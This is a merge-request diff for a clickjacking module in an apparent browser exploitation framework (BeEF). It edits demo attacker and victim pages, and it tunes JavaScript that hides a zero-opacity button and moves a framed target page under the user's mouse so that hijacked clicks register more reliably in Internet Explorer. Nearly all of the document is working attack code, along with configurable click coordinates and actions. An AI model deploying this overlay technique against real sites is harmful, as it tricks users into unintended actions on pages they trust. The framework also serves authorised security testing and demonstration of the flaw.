Merge pull request #744 from webstersprodigy/improved-clickjacking

Clickjacking Module Update: Better reliability in IE

extensions/demos/html/clickjacking/clickjack_attack.html

@@ -9,17 +9,18 @@
 
 <style type="text/css">
 body{
+margin:0;
+padding:0;
 color:#fff;
 font-family:'Neuton', georgia, serif;
 background-color:#999;
-width:100%;
-height:100%;
 }
 .quotes{
 width:100%;
 height:100%;
 text-align:center;
-margin:50px 0;
+margin:0 0 50px 0;
+padding-top:50px;
 }
 .quotes .inner{
 width:700px;
@@ -137,6 +138,9 @@ font-size:20px;
 
 <script type="text/javascript">
 $(document).ready(function(){
+$("body").width($(window).width()-10);
+$("body").height($(window).height()-70);
+
 var quotes = [];
 quotes[0] = {title: "Sometimes you gotta crack a few eggs to make an omelet.", footnote: "Charlie, It's Always Sunny In Philadelphia"};
 quotes[1] = {title: "Cats do not abide by the laws of nature.", footnote: "Charlie, It's Always Sunny In Philadelphia"};

extensions/demos/html/clickjacking/clickjack_victim.html

@@ -1,9 +1,14 @@
-<html>
-<body bgcolor="red">
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
+<head>
+	<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
+	<title></title>
+</head>
+<body style="background-color:red">
 
 <p>&nbsp;</p>
-<a href="#click1" onclick="javascript:alert('You clicked link1 at '+window.location);">moooooooo</a>
+<a href="#click1" onclick="javascript:alert('You clicked link1 at '+ window.location);">moooooooo</a>
 <p>&nbsp;</p>
-<a href="#click2" onclick="javascript:alert('You clicked link2 at '+window.location);">moooooooo</a>
+<a href="#click2" onclick="javascript:alert('You clicked link2 at '+ window.location);">moooooooo</a>
 </body>
 </html>

modules/social_engineering/clickjacking/command.js

@@ -67,7 +67,7 @@ beef.execute(function() {
 		var inner = $j.extend(true, {'border':'none', 'position':'absolute', 'width':'2000px', 'height':'10000px'}, stylesInner);
 
 		var containerDiv = $j('<div id="' + elems.outerFrame + '"></div>').css(container).prependTo('body');
-		var containerDiv = $j('<input id="' + elems.btn + '" type="button" value="invisible" style="width:1px;height:1px;opacity:0;alpha(opacity=0)" />').appendTo('body');
+		var containerDiv = $j('<input id="' + elems.btn + '" type="button" value="invisible" style="width:1px;height:1px;opacity:0;alpha(opacity=0);margin-left:-200px" />').appendTo('body');
 
 		var innerIframe = $j('<iframe id="' + elems.innerFrame + '" scrolling="no" />').attr(params).css(inner).load(callback).prependTo('#' + elems.outerFrame);
 
@@ -77,16 +77,16 @@ beef.execute(function() {
 	function step1(){
 		var btnSelector = "#" + elems.btn;
 		var outerSelector = "#" + elems.outerFrame;
-		var btnObj = $(btnSelector);
-		var outerObj = $(outerSelector);
+		var btnObj = $j(btnSelector);
+		var outerObj = $j(outerSelector);
 
-		$(window).mousemove(function(e) {
-			$(outerObj).css('top', e.pageY);
-			$(outerObj).css('left', e.pageX);
+		$j("body").mousemove(function(e) {
+			$j(outerObj).css('top', e.pageY);
+			$j(outerObj).css('left', e.pageX);
 		});
 
-		$(btnObj).focus();
-		$(btnObj).focusout(function() {
+		$j(btnObj).focus();
+		$j(btnObj).focusout(function() {
 			cjLog("Iframe clicked");
 			iframeClicked();
 		});
@@ -105,8 +105,8 @@ beef.execute(function() {
 
 		setTimeout(function(){
 			var btnSelector = "#" + elems.btn;
-			var btnObj = $(btnSelector);
-			$(btnObj).focus();
+			var btnObj = $j(btnSelector);
+			$j(btnObj).focus();
 
 			//check if there are any more actions to perform
 			try {
@@ -122,15 +122,15 @@ beef.execute(function() {
 
 	function updateIframePosition(){
 		var innerSelector = "#" + elems.innerFrame;
-		var innerObj = $(innerSelector);
-		$(innerObj).css('top', innerPos.top + 'px');
-		$(innerObj).css('left', innerPos.left + 'px');
+		var innerObj = $j(innerSelector);
+		$j(innerObj).css('top', innerPos.top + 'px');
+		$j(innerObj).css('left', innerPos.left + 'px');
 	}
 
 	//Remove outerFrame and persistent button
 	function removeAll(){
-		$("#" + elems.outerFrame).remove();
-		$("#" + elems.btn).remove();
+		$j("#" + elems.outerFrame).remove();
+		$j("#" + elems.btn).remove();
 	}
 
 	function cjLog(msg){

modules/social_engineering/clickjacking/module.rb

@@ -31,12 +31,12 @@ class Clickjacking < BeEF::Core::Command
 		{'name' => 'Click_1', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 1' },
 		{'name' => 'clickaction_1', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'$("#overlay1").data("overlay").close();', 'width' => '400px', 'height' => '50px'},
 		{'name' => 'iFrameLeft_1', 'ui_label' => 'X-pos', 'value' => '20', 'width'=>'100px' },
-		{'name' => 'iFrameTop_1', 'ui_label' => 'Y-pos', 'value' => '50', 'width'=>'100px' },
+		{'name' => 'iFrameTop_1', 'ui_label' => 'Y-pos', 'value' => '55', 'width'=>'100px' },
 
 		{'name' => 'Click_2', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 2' },
 		{'name' => 'clickaction_2', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'$(".more-quotes").trigger("click");', 'width' => '400px', 'height' => '50px'},
 		{'name' => 'iFrameLeft_2', 'ui_label' => 'X-pos', 'value' => '20', 'width'=>'100px' },
-		{'name' => 'iFrameTop_2', 'ui_label' => 'Y-pos', 'value' => '123', 'width'=>'100px' },
+		{'name' => 'iFrameTop_2', 'ui_label' => 'Y-pos', 'value' => '135', 'width'=>'100px' },
 
 		{'name' => 'Click_3', 'type' => 'label', 'html' => '~~~~~~~~~~ CLICK 3' },
 		{'name' => 'clickaction_3', 'ui_label'=>'JS', 'type' => 'textarea', 'value' =>'void(0)', 'width' => '400px', 'height' => '50px'},